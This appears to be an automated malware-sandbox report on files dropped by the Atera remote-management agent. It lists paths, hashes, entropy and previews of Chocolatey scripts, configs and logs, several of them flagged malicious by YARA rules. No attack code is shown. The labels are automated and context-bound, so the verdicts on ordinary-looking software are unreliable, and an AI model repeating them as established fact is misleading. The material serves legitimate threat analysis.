                                                                                                                                                                                                                                        Preview: Copyright (c) 2017 Chocolatey Software, Inc... Copyright (c) 2011 - 2017 RealDimensions Software, LLC.... Licensed under the Apache License, Version 2.0 (the "License");.. you may not use this file except in compliance with the License... You may obtain a copy of the License at.... http://www.apache.org/licenses/LICENSE-2.0.... Unless required by applicable law or agreed to in writing, software.. distributed under the License is distributed on an "AS IS" BASIS,.. WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied... See the License for the specific language governing permissions and.. limitations under the License.
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):710192
                                                                                                                                                                                                                                        Entropy (8bit):5.960396533079377
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:+BARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTU5:+BA/ZTvQD0XY0AJBSjRlXP36RMGU
                                                                                                                                                                                                                                        MD5:64BDDA183FE85175CA37B96EA3BFAD74
                                                                                                                                                                                                                                        SHA1:8A452E576174C432D4E8A3AF98FF424BDD76B924
                                                                                                                                                                                                                                        SHA-256:BCAC436A62C9728B03B1812F09AC14A2128E030BF7FFEEA14A1784603BED0885
                                                                                                                                                                                                                                        SHA-512:DF75C7D39C38DB9D60FB450FFCAD002B173B773F755E692BB29B07BFD3C43DCC893BD5E86038778697B182F28B27E51BDDB69932D5C11684ECECB735BC4A264D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):50224
                                                                                                                                                                                                                                        Entropy (8bit):6.218030250172801
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:nSrEZvG2rO1/ovmVLmAY23MrQ8lJkBnCMbTKEpYinAMxCf:KsG2KBVLFOzliBnBr7HxY
                                                                                                                                                                                                                                        MD5:6229504CC37B9624A68C37B43A1C608C
                                                                                                                                                                                                                                        SHA1:B8DDB5CD1D0A0B910BB6892BEAF824AFC09E938B
                                                                                                                                                                                                                                        SHA-256:62E577D151A2287A7CED56735B40F4AEFBBBC070E07DF5DA3D126F72EC309276
                                                                                                                                                                                                                                        SHA-512:46EB7B3B77E309C25016F0F8D49CBAB601B2E86131699870410308BC3F20F6B0D8FEC145C0AE2A7F66F590385BD1C1EBF70A1F4896CD7C1E9ED94ABD5E652BC9
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):662
                                                                                                                                                                                                                                        Entropy (8bit):4.952846219984862
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:TMHdGzNFF7ap+58hOf/2//3QOFip+5v5OXrRf/2//FicYo4xT:2duPF7N8OH2//3dVhOXrRH2/d9y
                                                                                                                                                                                                                                        MD5:0F638DECEBA5011AF737C29E90C20F6A
                                                                                                                                                                                                                                        SHA1:1484B6084C8231231C7C472A57E6835B4A3EA146
                                                                                                                                                                                                                                        SHA-256:B50494F0DDF2AC7DCFB74BAE526E74F67FF501AD0CD5B712834829DAD9563368
                                                                                                                                                                                                                                        SHA-512:0E26D3AD25DE0FD761D4F15E714AA136C19427AA02469BE8A1D0CE639FFC398E798BA30F19DBC77C8A231FC1B849D07A88C2BDC797C9D191847663F15ECA2917
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="log4net" publicKeyToken="669e0ddf0bb1aa2a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.0.12.0" newVersion="2.0.12.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3764), with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3764
                                                                                                                                                                                                                                        Entropy (8bit):5.620769202269081
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:HECI98IbI5anGIrKJ4f6/ShIdg+yuYqlUQp1YilXTeMjIR:HEC088I5anGF86/ShIg+yuYqlJXYE7U
                                                                                                                                                                                                                                        MD5:FC7A5AB8C8A580D3EEF4FE04C8C901F6
                                                                                                                                                                                                                                        SHA1:E5563B05D72245FE1FDD0F2AAEF5712B388C8569
                                                                                                                                                                                                                                        SHA-256:84AF00AA0E696CABA78EF4CF9C8975CA8DB5572A604D1291A964FCB68E00CFC1
                                                                                                                                                                                                                                        SHA-512:82ACE3069E19406C6546D4712BA990519E1F692CCC063E928E18C8E55608301B034047FDCCC90A81C871FC0A0CA78C12826B7B269E5AEBA455AA940910B8BF71
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):301
                                                                                                                                                                                                                                        Entropy (8bit):4.898878940140915
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:tVb5kBm7ObCDL7fsDPV7gRQQgb5kBm7ObCDL7fsDPV7gRvgOBLy:pem717f8PV7UQQ6em717f8PV7Up9y
                                                                                                                                                                                                                                        MD5:F5ADB4BF688F888451346501914E801D
                                                                                                                                                                                                                                        SHA1:B7103D27E3A34C5EA878D342FEE1C317234274A7
                                                                                                                                                                                                                                        SHA-256:D3524D2EEFAD5EDD967349655A68F23475D7C78B5BD97731AAF7AB353F277245
                                                                                                                                                                                                                                        SHA-512:4B517B4260D8F67443E5B581AD4AC07EF819C46B7B2504ADA75E26049D09176548E30CD469501ABC9CA35F1FA62B6FB2FBE218F39A4D85D786F511BE39A5EE2B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\choco-logs\10-02-2024 11_20_36-log.txt, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.Directory 'C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\lib' does not exist...Enabled allowGlobalConfirmation..Directory 'C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\lib' does not exist...0 packages installed...
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):411
                                                                                                                                                                                                                                        Entropy (8bit):4.870031447117875
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:tVb5kBm7ObCDL7fsDPV7gRoUvlwTS7v33LQ7mLLlGKACCWOKE2y7/oqAyhs9KF8J:pem717f8PV7UO+fo6BNVy/5XF8dIk
                                                                                                                                                                                                                                        MD5:CBC72DCD51D6F1A3123ABBA5169B79A8
                                                                                                                                                                                                                                        SHA1:8F16793BD8E55C7C881C5D9955170227790DE36A
                                                                                                                                                                                                                                        SHA-256:432BE74F2EF336472CD63F935CA96F9B41BD87B90DE93A8FA24F22274D9C0235
                                                                                                                                                                                                                                        SHA-512:139F087434FA794A34FAA04EA240BBCADAEF1655EEAA4F9E4E3DC4B331FEC64ECBD9B6314C602CCFD194A656ACC1BFE615D12DAECA31F6B51F8748616F2EC132
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\choco-logs\10-02-2024 11_20_47-log.txt, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.Directory 'C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\lib' does not exist...Outdated Packages.. Output is package name | current version | available version | pinned?......Chocolatey has determined 0 package(s) are outdated. ....Enjoy using Chocolatey? Explore more amazing features to take your..experience to the next level at.. https://chocolatey.org/compare..
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):6655024
                                                                                                                                                                                                                                        Entropy (8bit):6.267134407332975
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:98304:VCMEM0MUMRMxMwMkfqbjxbSzGVr4W11ByHY4W6upIw2:NlV1qKpkfqbjeGVr4NHYJ60B2
                                                                                                                                                                                                                                        MD5:28C1E670C16BDE257B6780D8EE26AB31
                                                                                                                                                                                                                                        SHA1:9786EC0C1730ED673A6CAB422E40529FDE6803EA
                                                                                                                                                                                                                                        SHA-256:A06F93EBB0C1E91286060B3CD63A166B72D4D4E6727D03A49B17538B22CE8074
                                                                                                                                                                                                                                        SHA-512:2AAAE6C2AB5F4857BF12EB24E126744A84F6C4C04F2AE1ED5348523E6F499E2BCF8A3D8BC4F99C7CD9E78CE1D8249C0F6EE094A626029A4BBC170F5C4902A27F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\chocolatey.dll, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (495), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):9380
                                                                                                                                                                                                                                        Entropy (8bit):4.897876021534469
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:rwhyxWvf7L6ZapbrzRmXBzCWKZD68NJ+IK2E8V1ExAuVXI4n7rJ+ZXVx:sjL6Z+Ht6B+WshDK2EiEJ7lEFx
                                                                                                                                                                                                                                        MD5:9D1528A2CE17522F6DE064AE2C2B608E
                                                                                                                                                                                                                                        SHA1:2F1CE8B589E57AB300BB93DDE176689689F75114
                                                                                                                                                                                                                                        SHA-256:11C9AD150A0D6C391C96E2B7F8AD20E774BDD4E622FCDFBF4F36B6593A736311
                                                                                                                                                                                                                                        SHA-512:A19B54ED24A2605691997D5293901B52B42F6AF7D6F6FDA20B9434C9243CC47870EC3AE2B72BDEA0E615F4E98C09532CB3B87F20C4257163E782C7AB76245E94
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<chocolatey xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">.. <config>.. <add key="cacheLocation" value="" description="Cache location if not TEMP folder. Replaces `$env:TEMP` value for choco.exe process. It is highly recommended this be set to make Chocolatey more deterministic in cleanup." />.. <add key="containsLegacyPackageInstalls" value="true" description="Install has packages installed prior to 0.9.9 series." />.. <add key="commandExecutionTimeoutSeconds" value="2700" description="Default timeout for command execution. '0' for infinite (starting in 0.10.4)." />.. <add key="proxy" value="" description="Explicit proxy location. Available in 0.9.9.9+." />.. <add key="proxyUser" value="" description="Optional proxy user. Available in 0.9.9.9+." />.. <add key="proxyPassword" value="" description="Optional proxy password. Encrypted. Available in 0.9.9.9+." />.. <add key
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (965), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):12946
                                                                                                                                                                                                                                        Entropy (8bit):5.132019659587194
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:ctpHjcTfbZO0g2ZyAvGZkAsoXCxAziDR/67E4Pb:ctpDBCvGZkAsCCxAziDR/sF
                                                                                                                                                                                                                                        MD5:0BB54C9DA241E0EAAFB6C976AC07EAA7
                                                                                                                                                                                                                                        SHA1:045808C9106A4C356AB15A2D8680FDB737DC98A6
                                                                                                                                                                                                                                        SHA-256:071CE6FCE85051E373C1B05BB82A92FFB8BEBF34C768B7A2F6E809000A78479F
                                                                                                                                                                                                                                        SHA-512:C118C9FEC5903D1F2F6A6FA070130FCEBAAD70AF3459DA82069C5C8ED3D66CEE374C098C6247CCD528187B6856FAA458EBBD8B6F2C0C68C2A5B8EF32C2D7CD75
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2011 - 2017 RealDimensions Software, LLC..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...#..# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....# Ideas from the Awesome Posh-Git - https://github.com/dahlbyk/posh-git..# Posh-Git License - https://github.com/dahlbyk/posh-git/blob/1941da2472eb668cde2d6a5fc921d5043a024386/LICENSE.txt..# http://www.jeremyskinner.co.uk/2010/03/07/using-git-with-windows-powershell/....$Global:ChocolateyTabSettings = New-Object PSObject -P
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3903
                                                                                                                                                                                                                                        Entropy (8bit):4.986280475081154
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:cSyL+4pGXHFKoqWJBYc4R2wf3TQJb3jl7t3iv:cSyL+QGXHMWJB7VFUv
                                                                                                                                                                                                                                        MD5:1CF35331F337493A5B5B8C482E32B507
                                                                                                                                                                                                                                        SHA1:149D5B5ABB4FF20CFAA333946BAAEC6B8EFA5630
                                                                                                                                                                                                                                        SHA-256:CCF763934E3801002C260246316DF70C64C66E7721C24B300C634567F5885A39
                                                                                                                                                                                                                                        SHA-512:03652CA25D2A78860F735B57600B940D2723DD23E24A2632D5CA76DBFACBF95CD1090428FB6AC23BF945AB20C1C201155CF26161361853DB94A5D85AE753C0A1
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....$helpersPath = Split-Path -Parent $MyInvocation.MyCommand.Definition....$global:DebugPreference = "SilentlyContinue"..if ($env:ChocolateyEnvironmentDebug -eq 'true') {.. $global:DebugPrefe
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1178
                                                                                                                                                                                                                                        Entropy (8bit):5.161789340951933
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:cSyJ3554IpgyZA0SU0E+SlHQk1GpsLAjQSDg6pucReEe7:cSyX54pyFd0AlH31KoLKRed
                                                                                                                                                                                                                                        MD5:610AD6370C8DACB3861200B8827DF768
                                                                                                                                                                                                                                        SHA1:E6831DF0C1ADB4664BDE6D2D48DCE28CC1918A83
                                                                                                                                                                                                                                        SHA-256:B06996C9A26663FCF41B2406D12C4597075AB7F94CDD320EEE64EAC9AEA95DFD
                                                                                                                                                                                                                                        SHA-512:C3A30128443E47D5D38CFD8C989E8317668EEDA6B4E85BEE94B76034479DEC0BED4C980ACD797153259CF0DF2807E79C3B3F4AAADF21E255A35BBDBE2F2E16E9
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2011 - 2017 RealDimensions Software, LLC..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# ..# You may obtain a copy of the License at..# ..# http://www.apache.org/licenses/LICENSE-2.0..# ..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....if (Get-Module chocolateyProfile) { return }....$thisDirectory = (Split-Path -parent $MyInvocation.MyCommand.Definition)..... $thisDirectory\functions\Write-FunctionCallLogMessage.ps1... $thisDirectory\functions\Get-EnvironmentVariable.ps1... $thisDirectory\functions\Get-EnvironmentVariableNames.ps1... $thisDirectory\fun
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2892
                                                                                                                                                                                                                                        Entropy (8bit):5.176658574720988
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:RkBibyQwcYIRQcRwAshP5l8kRMCpEMwK/JvoPEY0nzWBIxjO0L5E8bWHtt6rh4:eiAc5HGAshhCQMChR/JsZYzWBeO85Ecm
                                                                                                                                                                                                                                        MD5:EF32E09F41D2F8234E4482C6B52FFFB1
                                                                                                                                                                                                                                        SHA1:446185592825F7B7894CC5A9E2FCB4F015B9E810
                                                                                                                                                                                                                                        SHA-256:ACC5E8AB085FDD00B1C333853D74B1EC15777212A435C2DE8B56A490BE07103C
                                                                                                                                                                                                                                        SHA-512:7273DE65F571C4302BAC73C3FA3AEBDB7887B923EABAC10457C2A2C329B67979726440ED0C5E190C7728676D9382D4C8E2F4D030336630BC82AC7AE2FB20B58F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.param(.. [alias("ia","installArgs")][string] $installArguments = '',.. [alias("o","override","overrideArguments","notSilent")].. [switch] $overrideArgs = $false,.. [alias("x86")][switch] $forceX86 = $false,.. [alias("params","parameters","pkgParams")][string]$packageParameters = '',.. [string]$packageScript..)....$global:DebugPreference = "SilentlyContinue"..if ($env:ChocolateyEnvironmentDebug -eq 'true') { $global:DebugPreference = "Continue"; }..$global:VerbosePreference = "SilentlyContinue"..if ($env:ChocolateyEnvironmentVerbose -eq 'true') { $global:VerbosePreference = "Continue"; $verbosity = $true }....Write-Debug '---------------------------Script Execution---------------------------'..Write-Debug "Running 'ChocolateyScriptRunner' for $($env:packageName) v$($env:packageVersion) with packageScript `'$packageScript`', packageFolder:`'$($env:packageFolder)`', installArguments: `'$installArguments`', packageParameters: `'$packageParameters`',"....## Set the culture to invar
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1751
                                                                                                                                                                                                                                        Entropy (8bit):5.27319452124258
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:cSyJ3554IpXAAyU0E+SlHQk1GpsLAKFoYlMp9TlxNAZiTxGEXL5FGX/OFchWoCah:cSyX54q90AlH31Koyh9xnFVVc/4oqPli
                                                                                                                                                                                                                                        MD5:12E0A95C9BD0A49DA769C2927C648DFB
                                                                                                                                                                                                                                        SHA1:33174164C23D10B43E26CEE56E1A6FB60E8D9F4D
                                                                                                                                                                                                                                        SHA-256:3A2A002BD7213ECCE52FB82C470B824770A11DEB0A33DDB319A24824CE4676DA
                                                                                                                                                                                                                                        SHA-512:D19E22031409B216A10815FE606852712EF0136B9056541774DC66AE9C57994DE5A667AE1F925D547D1BCCF6AE9221D939F7CE2BFC87ABC98C634858E1CCAA7B
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2011 - 2017 RealDimensions Software, LLC..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...#..# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....Function Format-FileSize {..<#...SYNOPSIS..DO NOT USE. Not part of the public API......DESCRIPTION..Formats file size into a human readable format......NOTES..Available in 0.9.10+.....This function is not part of the API......INPUTS..None.....OUTPUTS..Returns a string representation of the file size in a more friendly..form
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (505), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):11504
                                                                                                                                                                                                                                        Entropy (8bit):5.008896354130034
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:cSyL+QGXHpi+o8HrDe07ZUWKVjakELFiuPOizDIinqSQ/fa:ctL+QGwKS07ZUOZPpDDyfa
                                                                                                                                                                                                                                        MD5:9443CB695D075DAA7DE91510A1E35C14
                                                                                                                                                                                                                                        SHA1:7676604D3C1F0BD26632DC41FCF1310908D422C6
                                                                                                                                                                                                                                        SHA-256:7095FB2F3F44FEE977D3B53DEE93B952D04325108B090F5F7E8503F758C27F18
                                                                                                                                                                                                                                        SHA-512:2D0B8C3345B6573F56A54D357BB700D83B3AB5A40DED0AA2DC5A40DAC0523DB86BBC5BAA10CB3B4B1785123B8F32CEC5A86F350AF315A2BFF6885C08BD77758F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Get-ChecksumValid {..<#...SYNOPSIS..Checks a file's checksum versus a passed checksum and checksum type......DESCRIPTION..Makes a determination if a file meets an expected checksum s
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):10482
                                                                                                                                                                                                                                        Entropy (8bit):5.191184135569746
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:cSyL+QGXHphcdudY/xIVBO6zgV6ZlR86nFTDzH0sQsPbnJ8Yc9bTp05va:ctL+QGTqudY/xcBOSt3XHRJNva
                                                                                                                                                                                                                                        MD5:F740F29F0AC79C7E5BA69B1CF3E6DC74
                                                                                                                                                                                                                                        SHA1:8F609B5BDCCE295AEF29011858B31608D26E8E04
                                                                                                                                                                                                                                        SHA-256:550231F4568914C786BF3BDE0FF4897DCE761084D33CFA6D8FD462B34A779D88
                                                                                                                                                                                                                                        SHA-512:FC567A01086E8E6A55AAD1E3AEA0E9639E2F8C03399728A5421214E1E0CBF726A7D0F7422EBE3CE74C226F27C11C051760CDAD2AFBB5E69294152669929AB05A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Get-ChocolateyUnzip {..<#...SYNOPSIS..Unzips an archive file and returns the location for further processing......DESCRIPTION..This unzips files using the 7-zip command line tool 7z.
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16502
                                                                                                                                                                                                                                        Entropy (8bit):5.146477219224201
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:cSyL+QGXHpWybOWetWKW3VjEve49W9cO1kazvJwKEDbrj:ctL+QGPnetZ2EvXOlybrj
                                                                                                                                                                                                                                        MD5:CD302EF4E080D330A9DEAFA584C049AB
                                                                                                                                                                                                                                        SHA1:53B98CD3540A35FF32E1E6DDA2BB3F786FAE23ED
                                                                                                                                                                                                                                        SHA-256:3E18EB6CF646474E9259E932679E04DF1CC4322E2E354A770F32A0F7D67C72A4
                                                                                                                                                                                                                                        SHA-512:B0D74A92DFB16CBE799C781CAD2702C6932BA5B15A28EE5AF2FB56A4CFA4317B2347AF227A9484A0536CC95674CFBB89343E3955C2457AFD0D23854963D85BFC
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
